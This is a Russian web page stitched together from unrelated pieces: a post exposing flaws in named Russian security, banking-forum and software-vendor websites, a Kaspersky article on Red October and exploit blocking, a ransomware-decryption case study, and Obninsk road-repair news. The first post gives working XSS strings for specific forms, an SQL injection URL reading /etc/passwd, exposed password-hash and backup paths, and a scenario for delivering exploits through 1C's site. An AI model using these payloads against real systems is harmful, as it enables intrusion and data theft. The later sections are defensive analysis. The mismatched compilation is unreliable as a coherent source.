Перейти к навигации

Чего стоит информационная безопасность на бумаге?

К написанию данного материала меня подтолкнула недавняя дискуссия в твиттере на тему информационной безопасности между NTarakanov и @alukatsky. По сути весь флейм сводился к тому, что «бумажные» аудиторы сидят в штабе и cгущенку хомячат, а простые пацаны себе на IDA заработать не могут.
Мало кто знает, но сейчас проходит V Юбилейный Уральский форум «Информационная безопасность банков»

На этом форуме собрались ветераны информационной безопасности для обсуждения важных вопросов. Однако, король-то сам голый.

Итак, поехали. На самом сервере расположены следующие сайты по ИБ форумам:
• pd-forum.ru
www.ib5.ib-bank.ru
www.ib-bank.ru
Рассмотрим грубейшие ошибки, допущенные на каждом из сайтов.
По адресу www.ib-bank.ru/info.php нам, видимо, показывают с помощью phpinfo(), как правильно настраивать PHP для максимально удобной эксплуатации и заливки шеллов. Отмечу основные лулзы:
• allow_url_fopen – для того, чтобы шелл заливать было удобней;
• display_errors – вывод ошибок для удобства SQL injection;
• register_globals – старый конь борозды не портит;

Под CRLF Injection/HTTP Respose Splitting попадают
www.ib-bank.ru/index.php
www.ib-bank.ru/gallery/addfav.php

Форма восстановления пароля, расположенная по адресу http://ib-bank.ru/gallery/forgot_passwd.php, не содержит каких-либо признаков защиты от CSRF, надо полагать, для экономии трафика.

Также в наличии немного исходного кода и бэкапов:
www.ib-bank.ru/index.php_
www.ib-bank.ru/gallery/sql/schema.sql

По адресу http://www.ib5.ib-bank.ru/.htpasswd нас ждет хэш пароля в открытом доступе.

Вероятно, так надо по 152-фз, PCI DSS, СТО БР ИББС, я не специалист по ИБ, так что судить не берусь.

По адресу http://journal.ib-bank.ru/feedback нас ждет банальный множественный XSS.

Можете сами проверить, подставив во все поля
1" onfocus=prompt(1337) autofocus=true lol="
Только галочку «Я не робот» не ставьте, а то чуда не произойдет. Такая вот своеобразная нынче защита от роботов.

По адресу
http://journal.ib-bank.ru/template/modules/calendar/ calendar.php_
нас ожидает любезно забытый бэкап кода календаря.

На странице http://pd-forum.ru/qr.php можете задать вопрос регулятору и заодно увидеть опять множественный XSS.

Главное опять быть роботом. Текст для копипасты в поля следующий
1" onmouseover=prompt(1337) lol="

Файлы советую качать тут http://pd-forum.ru/files/
Они там, как и во всех директориях просто показываются списком.

Куски исходников показываются тут:
http://pd-forum.ru/index.php_
http://pd-forum.ru/prg.php_
http://pd-forum.ru/prg.php_old

То, что на всех этих сайтах cookie устанавливаются без httpOnly флага в данной ситуации, – это нормально.

Теперь внимание! Вопрос к знатокам: чем занимаются все эти люди?

Выводы об аудиторах, не делающих аудит себе, делайте сами, я свои уже сделал. Для меня «бумажный» аудит стал синонимом слова распил. В России по сути только Digital Security (привет парни) и Positive Technologies заняты делом, поэтому и признаны за рубежом. Ни в одной из этих компаний я не работаю, так что не считайте это рекламой.
UPD. Небольшое продолжение цирка.
Большинство описанных ляпов уже прикрыли простым удалением файлов. И даже рапортовали о том что все ОК.

Но мы то с вами знаем, что это не так...


ЧАСТЬ ВТОРАЯ. Интеграторы

Продолжая мысль про «бумажных специалистов» хочется отметить, что помимо специалистов по ИБ есть еще и интеграторы. И с ними ситуация не лучше.

Чем занимается фирма 1С думаю не нужно рассказывать.
http://1c.ru/search/search.cgi?wm=-->&wf=2221&GroupBySite=no&ul=http://www.1c.ru&q=1&cmd=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA
Здесь компания 1C несколько раз приветствует вас пассивной XSS уязвимостью

www.1c.ru/rus/partners/training/cso/timetable.jsp?f=1&city=1%27%20or%20%...
По этому адресу фирма 1С любезно предлагает ознакомиться с курсом валют, а заодно и со всей базой данных через SQL инъекцию.

Компания NAUMEN — ведущий российский разработчик программных решений для бизнеса и органов власти. Страх и ужас.

http://www.naumen.ru/clients?filter=s_9999 union select 1,2,3,4,5,LOAD_FILE('/etc/passwd'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&show_comments=1

www.naumen.ru/tests/

LETA IT-company – один из лидеров рынка информационной безопасности в России, первый оператор типизированных ИТ-услуг. Компания работает на российском рынке информационных технологий начиная с 2003 года.

www.letagroup.ru/rus/library/?company=21%22/a%3E%3Cscript%3Ealert%281001...

ICL-КПО ВС — ведущая российская компания, предоставляющая комплексные решения в области информационных технологий и услуги по консалтингу, проектированию, внедрению, гарантийному и сервисному обслуживанию информационных систем любого масштаба.
www.icl.ru/web/guest/about?p_p_id=82&p_p_action=1&p_p_state=normal&p_p_m...

Данная статья не призывает совершать противоправные действия, она лишь констатирует очень плохую тенденцию на рынке ИБ в России. Наверху озабочены в основном соответствием нормативам и получением сертификатов, а внизу в копилках копятся баги. Такая ситуация ни к чему хорошему не приведет. В выигрыше от такого положения дел только киберкриминал.

Недавно в твиттере возникла дискуссия на тему третьей мировой, так вот я считаю, что, если она и будет, то она будет в основном кибервойной. И мы, как страна, к ней категорически не готовы, потому что безопасность у нас в основном на бумаге.

Оригинальный текст и полный список багов. Проверять все ошибки у меня нет ни времени, ни желания. Просьба поделиться инвайтом на хабр c человеком слившим все эти баги. Почта для инвайта habrleaks@mail.

Update 1: by @_Zeefa
Где-то 8-9 месяцев назад начальнику отдела который занимается пентестами писал про XSS

Update 3:

Если говорить о плохом сценарии использования такой уязвимости в сайте фирмы 1С, к которому могли бы прибегнуть преступники, то мне кажется вполне возможен такой вариант.

Распространнение ссылки на скачивание обновления 1С по базе мыл бухгалтеров. Встречать всю эту клиентскую массу с помощью 1day эксплойтов на основе bindiff по blogs.technet.com/b/srd/ Там как раз пара штук IE+LPE. Причем на сайту MS написано следующее:
Likely to see reliable exploits developed within next 30 days

Сертифицированные средства защиты скорее всего дадут слабину.
Файрволы cisco пропустят HTTP GET на сайт 1с как на доверенный.
Админы, отключающие для бухгалтера доступ на сайт 1С меня бы как минимум удивили.
Автоапдейт windows включен скажем так мягко говоря не у всех,
ибо задолбал своим окошком с предложением перезагруки и прочими суицидальными наклонностями.

Антивирусные решения не спасли бы по причине отсутствия сигнатур,
коих даже на 1day эксплойты, как правило не бывает до тех пор пока они не утекут в паблик.
В любом случае у атакующего тут очень хорошее преимущество, эксплойт можно обкатывать заранее на всех АВ.А вот АВ 1day сплойты явно писать не будут, чтобы проверить проактивку.

И еще раз хочу заметить, я не призываю совершать противозаконные действия.
Просто я, как несертифицированный специалист говорю, что такие баги могут иметь далекоидущие последствия.

В это же время комментарии сертифицированных специалистов, занимающихся оценкой рисков выглядят мягко говоря странно.

По материалам публикаций в сети Интернет

Технология разоблачения Red October

Еще одна мировая киберугроза раскрыта экспертами Лаборатории Касперского. На этот раз речь идёт о целевой атаке, а точнее обширной сети кибершпионажа против дипломатических и государственных структур, НИИ, промышленных компаний и военных ведомств разных стран.

Этому событию предшествовало расследование Red October, которое началось в октябре 2012 года, когда по просьбе одного из наших партнеров мы провели анализ атаки и вредоносных модулей на тот момент еще неизвестного вредоносного кода. Это помогло нам определить истинные размеры кампании, которая, как оказалось, охватывает около 20 стран мира.

Расследование показало использование как минимум четырех различных эксплойтов к уже известным уязвимостям: CVE-2009-3129 (MS Excel), CVE-2010-3333 (MS Word) и CVE-2012-0158 (MS Word), CVE-2011-3544 (Java). Эксплойты используются в документах, рассылаемых в ходе целевых фишинговых атак. После открытия такого файла загружается основной модуль вредоносного кода, который выполняет функцию 'точки входа' в систему и позволяет загрузить дополнительные модули для следующих стадий атаки.

На сегодняшний день мы выявили около 1000 вредоносных файлов, относящихся к 30 различным группам модулей. Все они были созданы в период с 2007 года по начало 2013, а самые свежие датированы 8 января 2013 года.
Сейчас наши антивирусные продукты, включая мобильные под Windows, детектируют файлы этого зловреда сигнатурами как Backdoor.Win32.Sputnik. А эксплойты как Trojan-Dropper.MSWord.Agent.ga, Exploit.MSWord.CVE-2010-3333.bw, Exploit.Win32.CVE-2012-0158.j и Exploit.Java.CVE-2011-3544.l эвристическим способом. Эвристические детектирование – технология, которая дает возможность одной сигнатурой детектировать множество вредоносных файлов, в том числе и ранее неизвестные модификации вредоносного ПО, одновременно позволяя добиться повышения качества детектирования и уменьшения размера антивирусных баз.

Чрезвычайно интересным остается вопрос, детектировался ли этот вредоносный код до октября?

Как показывают данные Kaspersky Security Network (KSN), часть вредоносных файлов Red October уже блокировались нашими продуктами, до октября 2012. Компоненты (dll, exe) блокировались сигнатурами, которые мы наложили на файлы, полученные из наших стандартных источников (KSN, вирусные коллекции, почта и т.д.). Вердикты носили имя, например: Trojan.Win32.Monzat.ac, Trojan.Win32.Genome.afykf, Trojan.Win32.Agent2.fhqq, Net-Worm.Win32.Kolab.baih.

Анализ атаки позволил систематизировать имеющиеся знания, собрать недостающую информацию и объединить существующие и новые экземпляры вредоносных файлов под одним именем: Backdoor.Win32.Sputnik.
Эксплойты, использовавшиеся для заражения, блокировались технологией Automatic Exploit Prevention (АЕР) под именем PDM:Exploit.Win32.Generic, которое является общим для всех типов эксплойтов, если они не специально не выделены нашими аналитиками. Прототип технологии АЕР был реализован в Kaspersky Internet Security 2012 и Kaspersky Endpoint Security 8, а полная версия включена в состав в состав Kaspersky Internet Security 2013 и Kaspersky Endpoint Security 10.
Для того чтобы понять каким образом Automatic Exploit Prevention обнаружил эти угрозы, давайте рассмотрим принцип работы технологии.

Технология Automatic Exploit Prevention

Automatic Exploit Prevention (АЕР) является обширным набором технологий, препятствующих срабатыванию эксплойтов, использующих уязвимости в различных программах и операционной системе. Также АЕР препятствует развитию вредоносного поведения, если эксплойт всё-таки сработал.

В основе технологии лежит анализ поведения эксплойтов, а также сведения о приложениях, которые чаще других подвергаются атакам злоумышленников, например Adobe Acrobat, Java, Windows компоненты, Internet Exprorer и другие. За такими программами устанавливается особый контроль — как только одна из них пытается запустить подозрительный программный код, процедура прерывается и начинается проверка.

Довольно часто эксплойты перед непосредственным заражением системы осуществляют предварительную загрузку файлов. АЕР отслеживает обращение к программ к сети и анализирует источник файлов. Технология может также различать файлы, созданные при участии пользователя, и новые, неавторизованные. Соответственно, попытка запустить файл, загруженный из подозрительного источника и без ведома пользователя, также будет заблокирована.

Еще один используемый в АЕР метод основан на технологии Address Space Layout Randomization (ASLR). Поддержка подобной технологии встроена в операционную систему Windows (начиная с Vista) и обеспечивает случайное расположение ключевых данных (например, системных библиотек) в адресном пространстве, что значительно усложняет использование злоумышленниками некоторых уязвимостей. Технология предлагает пользователю функцию Forced Address Space Layout Randomization, которая выполняет те же операции и способна работать в тех случаях, когда аналогичная система в Windows бессильна. В частности, Forced ASLR может работать и в Windows XP.

Поставщиком информации о событиях, происходящих на компьютере пользователя, для АЕР является компонент System Watcher, который входит в состав KAV, KIS, Pure, Endpoint 10. System Watcher в масштабе реального времени анализирует действия всех установленных на компьютере программ и системных сервисов и в случае подозрительной активности блокирует исполнение. Производит он это на основе так называемых BSS-шаблонов (Behavior Stream Signatures) – моделей вредоносного поведения, по которым можно вычислить неизвестный экземпляр вредоносного кода.

Подход к защите на основе поведенческого анализа является крайне эффективным против часто меняющихся вредоносных программ. Если что-то не могут детектировать статические методы обнаружения или облачные технологии, вредоносное ПО будет определяться технологиями на основе поведенческого анализа, даже если речь идет о неизвестном ранее эксплойте, использующем уязвимость «нулевого дня».

Именно такой подход позволил блокировать эксплойты, которые впоследствии оказались частью атаки Red October.

Технология борьбы с 0-day уязвимостями

Информация о другом громком инциденте, на этот раз связанным с использованием 0-day уязвимости CVE 2013-0422 в 1.7 и 10 версии Java приложения, стала доступна общественности 10 января 2013 года из публикации Disable Java plugin Now. С помощью этой уязвимости злоумышленники могут запустить на атакуемом компьютере произвольный программный код.
Кампания по распространению эксплойта для этой уязвимости имеет огромные масштабы. При нажатии на рекламные баннеры, в многочисленном количестве размещенные в разных странах на легальных сайтах, к примеру, новостных, сайтах погоды или сайтах с контентом для взрослых, посетители попадают на веб-ресурс, содержащий экслоиты одной из самых популярных связок эксплойтов Blackhole, в том числе этот Java 0-day.

Согласно статистике, опубликованной владельцами Blackhole эффективность этого эксплойта более 83%.

Специалисты подразделения по противодействию киберугрозам министерства национальной безопасности США рекомендуют пользователям отключить надстройку Java в веб-браузерах для защиты от атак злоумышленников, которые используют ранее неизвестную уязвимость в программной платформе Java.
Как же обстоят дела с защитой от этого эксплойта? Согласно статистике Kaspersky Security Network, проникновение этого эксплойта на компьютер пользователя блокировалось продуктами Лаборатории Касперского, а именно технологией АЕР, еще до того, как инцидент получил публичную огласку. Блокировка осуществлялась при помощи поведенческого анализа, т.е. проактивно.

Впервые этот эксплойт был опознан технологией АЕР в начале декабря, т.е. пользователи наших продуктов были защищены еще до того, как он стал активно использоваться вирусописателями.

Результаты независимых тестов

Большинство независимых тестовых лабораторий на сегодняшний день проверяют три ключевых параметра антивирусной защиты: качество обнаружения зловредного кода, ложные срабатывания и производительность. Лишь некоторые из них тестируют более специализированные направления, в том числе качество обнаружения эксплойтов.
Один из таких тестов был проведен компанией MRG в 2012 году.

Методология проведения тестирования заключалась в использовании Metasploit Framework и предоставляемого им набора эксплойтов, основанных на уязвимостях, для которых на тот момент отсутствовал патч от официального вендора. Система считалась защищенной, если в процессе запуска эксплойта блокировалась инициализация его полезной нагрузки.

Результаты теста демонстрируют преимущество продуктов Лаборатории Касперского в качестве защиты от различных типов эксплойтов.

Заключение

На сегодняшний день эксплойты являются наиболее распространенным способом проникновения зловредного кода на компьютер пользователя. Они применяются как в целевых атаках, таких как Red October, так и в массовых заражениях через связки эксплойтов, например Blackhole.

Для надежной защиты пользователя производители продуктов endpoint security должны уделять особое внимание борьбе с этим типом угроз. Традиционных сигнатурных способов недостаточно, поскольку они способны блокировать лишь известные эксплойты. Поэтому наиболее эффективным способом защиты являются технологии, основанные на поведенческом анализе.
У Лаборатории Касперского набор технологий для защиты от эксплойтов называется Automatic Exploit Prevention (АЕР), он реализован в продуктах KAV, KIS, Pure, Endpoint. АЕР блокирует исполнение эксплойтов, использующих уязвимости в различных программах и операционной системе. Также АЕР препятствует развитию вредоносного поведения, если эксплойт всё-таки сработал.

Успешное блокирование зловредного кода, использующегося в Red October, эксплойтов Java 0-day, а также результаты независимых тестов, доказывают, что АЕР действительно эффективен в борьбе с неизвестными уязвимостями, в том числе 0-day уязвимостями.

В то же время мы считаем, что не существует одной технологии, способной защитить пользователя от всех типов угроз. А последние проценты в защите даются наиболее тяжело. Поэтому мы, как компания, движимая технологической разработкой, продолжаем биться за последние проценты в защите пользователя и регулярно выпускаем новые технологии, такие как Whitelist, Application Control, Default Deny, Safe Money. Это позволяет продуктам Лаборатории Касперского обеспечивать надежную комплексную защиту от компьютерных угроз, в том числе новых и ранее неизвестных.

«Лаборатория Касперского»

История борьбы с трояном-файлошифровальщиком...

Введение

История началась с того, что в начале дня раздался звонок. Взволнованный голос клиента рассказал, что комп не загружается, документы не открываются, а вместо привычного рабочего стола на экране угрожающая надпись с приблизительным смыслом: «заплати нам деньги и мы вернем тебе рабочий стол и документы». Знакомая многим ситуация: вероятнее всего на компьютере очередной винлокер, работы по выпилу вымогателя займут максимум 10 минут.

Ради удаления винлокера за 10 минут не хотелось ехать в другой конец города, поэтому договорились о том, что системник привезут ко мне, я его приведу в порядок и верну обратно.

Получил системник, включил. Загрузился виндовс ХР. Появился рабочий стол – никаких признаков винлокера, с первого взгляда все нормально. Однако, попытавшись открыть первый попавшийся документ с рабочего стола, получил в ответ «страшное» сообщение:

Естественно, как и любой человек, который не первый раз сталкивается с троянами-вымогателями, я отнесся к данному тексту с изрядной долей скепсиса. Наверняка, подумал я, здесь все дело в обычной программе, которая перенастроила на себя обработку открытия файлов с расширением .doc и .xls для того, чтобы пугать неопытных пользователей текстом с непонятными словами. Чтобы убедиться в этом предположении и поймать программу-хулигана, загрузил компьютер с образа для восстановления системы, открыл диск C в файловом менеджере и увидел совсем нерадостную картину: все файлы на локальных дисках внезапно приобрели расширение M5bFu, а их содержимое стало похоже на результат работы генератора случайных чисел. От прежнего содержимого файлов не осталось ни следа.

Итак, сообщение о том, что файлы зашифрованы оказалось чистой правдой. Зашифрованными оказались все файлы размером менее 2 гигабайт с расширением doc, xls, dbf, avi, jpg, txt, rar, zip – в общем все, что может представлять ценность для владельца информации. Среди зашифрованных файлов – база 1С и важные документы. Если 1С еще можно было восстановить из свежего бэкапа, то пропажа ценных документов и фотографий могла бы сильно пошатнуть здоровье клиента. Таким образом, выбора не было – пришлось взяться за расшифровку данных.

Этап 1. Поиск алгоритма шифрования

Опять же, будучи от природы слегка недоверчевым, решил, несмотря на явное указание алгоритма шифрования в сообщении, самостоятельно определить каким криптоалгоритмом зашифрованы данные в файлах (вдруг все не так страшно, как написано). Сначала проверяем самые простые и распространенные шифры замены: шифр цезаря, XOR и т.п.

Для анализа берем два файла dbf: один зашифрованный из зараженной системы, другой нетронутый из свежего бэкапа и сравниваем их друг с другом. На примитивный шифр замены нам могут указать области исходного dbf-файла, заполненные идущими подряд одинаковыми байтами, например со значением 0. Благо файлы dbf не отличаются высокой плотностью хранимой информации, и нулевых байтов в них предостаточно.

На рисунке видны фрагменты исходного файла с несколькими нулями подряд и то, во что эти нули превратились в зашифрованном файле. Простые поточные шифры замены, где символ открытого текста преобразовывается в один и тот же символ криптограммы, отпали сразу. Более глубокий анализ показал, что простой посимвольный XOR открытого текста с ключевым словом тоже не имеет здесь место. В конце концов, удалось выяснить, что шифр блочный, без обратной связи и гаммирования. Длина блока – 16 байт.

Таким образом, пришлось принять как гипотезу использование шифра RC6, указанного в сообщении от создателей трояна. Впоследствии гипотеза подтвердилась, а именно шифрование выполнено алгоритмом RC6 с длиной блока 16 байт, причем применяется он «влоб», по блок-схеме. Авторы реализации даже не озаботились о шифровании неполных блоков, менее 16 байт, оставив их как есть, незашифрованными.

Итак, алгоритм известен. Осталось дело за малым: найти ключ.

Этап 2. Поиск ключа

Для поиска ключа найдем сначала тело вредоносной программы (или то, что от этого тела осталось). В каталоге %SYSTEMROOT%\System32 находим 2 «лишних» exe-файла: system.exe и еще один исполняемый файл с рандомным именем (H3w2DWg.exe). Оба файла являются частью заразившего систему троянца, однако ни один из файлов на момент обнаружения (апрель 2012 года) не опознавался антивирусами как вредоносный. На данный момент некоторые антивирусы опознают троянскую программу верно как Trojan.Encoder.136 (DrWeb) или как Win32/Filecoder.AF (ESET-NOD32), однако большинство антивирусов в лучшем случае думают что это просто слегка подозрительный файл. Вот ссылка на virustotal.

Раз троянец не опознается антивирусами, придется препарировать его самому. Вооружившись hiew32, OllyDbg и виртуальной машиной, приступил к вскрытию. Вскрытие показало, что файлы троянца не упакованы, не зашифрованы и написаны на Borland Delphi. Внутри также были обнаружены ссылки на зашифрованные файлы account.cfg, config.cfg и lock.cfg, лежащие также в %SYSTEMROOT%\System32. Путем отладки в недрах exe-файлов также был найден некий ключ в виде строки символов «1kv9yha029v9vi71xioa7h812ga811n9» длиной 32. С помощью этого ключа троянец расшифровывал файл lock.cfg.
Осталось понять каким образом данная строка преобразуется в ключ RC6. Длина ключа RC6 – от 128 бит и больше. В качестве первой попытки попробуем преобразовать каждый символ в 8-битное представление через ASCII-код. В результате получаем ключ длины 32*8=256 бит. Пишем программу на С++, подаем программе на вход ключ и файл lock.cfg. Запускаем процесс расшифровки. Неудача. Файл не расшифровался.

Какие остались варианты? Самый долгий и кропотливый – выдернуть алгоритм формирования ключа отладчиком из исполняемого файла. Оставил этот вариант на крайний случай из-за его избыточной трудоемкости. Вместо этого немного подумаем и поставим себя на место создателей вредоносной программы. Вряд ли авторы трояна самостоятельно реализовывали алгоритм шифрования. С большой вероятностью готовая реализация алгоритма на дельфи была скачана из интернета. Также вряд ли использовались готовые скомпилированные библиотеки, в них криптоалгоритм был бы реализован гораздо качественнее и уж точно не оставлял бы незашифрованными блоки менее 16 байт. Делаем вывод, что в троянце скорее всего использовалась студенческая учебная программа, исходники которой злоумышленники стащили из интернета.

Залазим в Гугль и ищем что-нибудь по ключевым словам Delphi RC6. Находим ссылку http://www.delphi-club.ru/delphi/rc6_encryption.html. Так и есть, модуль на Дельфи, который шифрует файл блоками без гаммирования и оставляет незашифрованным последний блок длиной менее 16 байт. Берем из реализации особенности формирования ключа, переписываем их на С++, компилируем программу расшифровки. Скармливаем программе 32-символьный ключ, пытаемся расшифровать файл lock.cfg. Опять неудача.

Остался вариант с OllyDbg и телом троянца. Не буду утомлять подробностями получения секретного алгоритма, по которому формировался ключ, тем более что сама процедура заняла не так уж много времени. Секрет был прост. Строка символов с ключом считывалась из ресурсов файла в кодировке ASCII (32 символа=32 байта), затем (видимо самим Delphi) преобразовывалась в UTF-16LE – получалось 64 байта (на практике байты просто разбавлялись нулями). И этот результат уже скармливался известному, благодаря исходникам на дельфи, алгоритму получения ключа. Длина ключа на выходе — 512 бит.

Полученным ключом файл lock.cfg был успешно расшифрован. Внутри файла обнаружился ключ к файлам config.cfg и account.cfg, а также список доменных имен сайтов для блокировки через файл hosts и список «вредных» по мнению троянца процессов (антивирусы, файрволлы) – тоже, вероятно, для блокировки.

Файл account.cfg содержал пару дополнительных ключей (в том же формате строки из 32 символов), номер счета на ДеньгиMail.ru, чей-то e-mail адрес, сведения о зараженном компьютере и еще какую-то мелкую информацию. В файле config.cfg, помимо всего прочего, был ip-адрес компьютера, который, по всем признакам, являлся управляющим сервером вредоносной программы.

Однако, как это ни печально, ни один из найденных в файлах ключей не подходил для расшифровки файлов на дисках зараженного компьютера. Еще одно утверждение злоумышленников оказалось правдой: ключ для расшифровки файлов действительно не хранится на компьютере. Осталась последняя надежда – вытрясти ключ из управляющего сервера вредоносной программы. Согласно сообщению от авторов троянца, ключ хранится там в течение 7 дней, именно в этот срок его нужно добыть, иначе расшифровать файлы не получится – подбор 32-символьного ключа из комбинации цифр и латинских букв верхнего и нижнего регистра займет десятилетия, а файлы с ценными документами нужны срочно.

Этап 3. В центр управления за ключом

Перед тем, как отправиться в центр управления, необходимо выяснить несколько особенностей его работы, а именно: какой транспортный протокол используется для соединения с сервером, шифруется соединение или нет, как клиент и сервер обмениваются данными между собой. Для решения этих вопросов самым очевидным вариантом было внедрить троянца на чистую систему и пронаблюдать за его сетевым обменом с сервером управления.

На виртуальную машину была установлена чистая операционная система, на основной машине запущен WireShark, на виртуальной – троянец. Выяснилось, что для связи используется незашифрованное соединение через TCP-порт 80. При первичном заражении на сервер уходят данные компьютера (ОС, процессор, память), а с сервера скачиваются дополнительные модули троянца, а также dll-файлы библиотеки SSLeay, которые затем используются для работы с сайтом ДеньгиMail.ru.

Вероятнее всего при отправке на сервер данных компьютера, происходит создание учетной записи компьютера на сервере (на это был намек в сообщении от авторов, в разделе о переустановке операционной системы). Вместе с учетной записью предположительно создается уникальный ключ, которым впоследствии шифруются данные на жестком диске. Вот этот ключ и необходимо добыть.

При повторном запуске троянца на зараженном компьютере также происходит обращение к управляющему серверу. При этом троянец уже не сообщает данные о компьютере, а предоставляет серверу ключ, который хранится в файле account.cfg. Именно этот ключ и является идентификатором зараженного компьютера и именно с помощью этого ключа мы и будем получать ключ для расшифровки файлов.

Обмен с управляющим сервером ведется в формате: «команда клиента – ответ сервера». Покопавшись в недрах вредоносной программы, вытащил список допустимых команд: mail, rekey, key, check_pay, get_masks, ssl, winlock и много других. Из WireShark’а узнал формат клиентских команд и параметров. Настало время экспериментов. Зайдя на сервер с помощью telnet и представившись зараженным компьютером (команда client_info с параметром в виде ключа), ввел команду key, в ответ на которую получил готовый ключ для расшифровки файлов.

В итоге дописал программу на С++, расшифровывающую все файлы на диске. Клиент получил обратно все свои файлы и рабочий стол впридачу.

Заключение

Отнюдь не считаю себя вирус-аналитиком и думаю, что в данном случае на пути к победе мне помогли несколько очевидных промахов злоумышленников. Во-первых, авторы вредоносной программы сами раскрыли много важной информации в своем сообщении пользователю: алгоритм шифрования и тот факт, что ключ хранится на сервере. Во-вторых, обмен с сервером производился по открытым каналам с помощью достаточно простого текстового протокола – это существенно ускорило процесс получения ключа. В-третьих, авторы троянца не слишком заморачивались по поводу защиты своего продукта от декомпиляции и отладки, что в конечном итоге упростило анализ алгоритма шифрования и получения ключа. Да и общее впечатление: кто-то просто хотел по-быстрому срубить денег, не особо заботясь о защите своего продукта от взлома.

Остается надеяться, что в будущем подобные вредоносные программы не приобретут широкую популярность. Уж лучше безобидные винлокеры, чем такие вот вымогатели, благодаря которым можно лишиться своих файлов навсегда.

По материалам публикаций в сети Интернет

12 мая 2012 года. Открытие дворца спорта "ОЛИМП"

Телесюжеты

Ремонт дорог
сюжет ТРК "Крылья" 20.04.2012
Снегопад в Обнинске
сюжет ТРК "Крылья" 05.04.2012
О работе коммунальных служб города
сюжет ТРК "Крылья" 29.11.2012г

Ямочный каталог

Опубликовано: 14 апреля 2012 газета " НГ- Регион"
№ 14 (953) от 13.04.2012

В ближайшие дни на сайте администрации города заработает электронная карта аварийно-опасных ям с графиком их устранения.

На самом деле и без карты ясно: дороги в городе убиты напрочь. И ладно бы, из-под снега вылезли «некомфортные для езды» ямки — весной это не редкость, такие еще можно пережить, каждый год их заливают литым асфальтом. Дело хуже: в городе образовалось огромное количество объективно аварийно-опасных ям, где, по выражению замглавы администрации Владислава Шапши, «можно оставить не только колеса, но и всю подвеску».

Как отмечают в МПКХ, предъявлять претензии к качеству ремонта городских дорог в этом году уже некому: нынешней весной разом закончилась гарантия на большинство проездов. Лишь по отдельным «кусочкам», которые ремонтировались недавно (северный въезд, ул. Кабицынская, ул. Белкинская) подрядной организации уже выставлены гарантийные претензии, дефекты будут устранены. Что же до остальных ям — их город будет ликвидировать своими силами.

По словам руководителя МПКХ Сергея Клименко, на сегодняшний день в Обнинске ликвидировано 1 тыс. кв. м ям — в два с половиной раза больше обычного, и это еще не конец: дороги разрушаются на глазах. «Водители города справедливо жалуются: внутри и вокруг отфрезерованных ям скапливаются лужи, люди даже не видят, куда они едут, — отметил на административной планерке Владислав Шапша. — Места ремонтных работ никак не отмечены, это надо срочно исправлять».

Как раз сейчас МПКХ докупил необходимое количество дорожных знаков, в ближайшее время их расставят возле ям, которые будут заделывать в порядке очереди. Что же до серьезного ремонта — МПКХ намерено часть средств получить из областного бюджета, все необходимые документы будут подготовлены на днях.

Кроме того, Владислав Шапша предложил установить за дорогами города народный контроль: выложить в Интернете электронную карту дорог с указанием наиболее опасных ям, их «адресами», и чтобы горожане сами могли бы добавлять туда «свои» ямы — если вдруг коммунальные службы их пропустят. Но самое главное — у каждой «электронной ямы» должен быть указан срок устранения, чтобы люди могли проконтролировать процесс и знать, в какой последовательности будут ремонтироваться те или иные участки. По задумке городских властей, «электронный каталог ям» должен заработать на портале администрации Обнинска по адресу www.admobninsk.ru уже в ближайшее время.

Страницы

Подписка на Коммунальное хозяйство RSS


Main menu 2

about seo